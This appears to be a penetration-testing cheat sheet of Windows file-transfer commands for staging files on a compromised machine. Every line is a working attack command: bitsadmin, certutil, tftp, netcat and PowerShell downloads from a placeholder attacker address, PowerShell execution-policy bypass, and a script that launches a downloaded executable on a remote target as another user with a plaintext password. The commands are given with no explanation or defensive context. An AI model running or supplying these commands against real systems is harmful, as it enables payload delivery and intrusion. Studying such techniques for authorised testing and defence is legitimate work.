Windows Transfer Methods
bitsadmin /transfer download /priority normal http://IP_ADDR/file C:\\output\\path (Works on Windows 7/Windows Server 2000+)
nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine)
ftp -s:input.txt
tftp -i get file /path/on/victim
powershell.exe -exec bypass -Command “& {iex((New-Object System.Net.WebClient).DownloadFile(‘http://IP_ADDR:PORT/FILE','C:\\Users\\user\\AppData\\Local\\ack.exe'));}”
certutil -urlcache -split -f “http://IP_ADDR/FILE" FILENAME
Powershell Transfer
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = “http://IP_ADDR/FILE" >> wget.ps1
echo $file = “FILE” >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File <filename>
Powershell Transfer as another user
echo $secpasswd = ConvertTo-SecureString “insert_plaintext_password_here” -AsPlainText -Force > execute.ps1
echo $mycreds = New-Object System.Management.Automation.PSCredential(“username”, $secpasswd) >> execute.ps1
echo $computer = “target_host” >> execute.ps1
echo [System.Diagnostics.Process]::Start(“C:\\Users\\user\\Downloads\\firewall.exe”, “”, $mycreds.Username, $mycreds.Password, $computer) >> execute.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File <filename>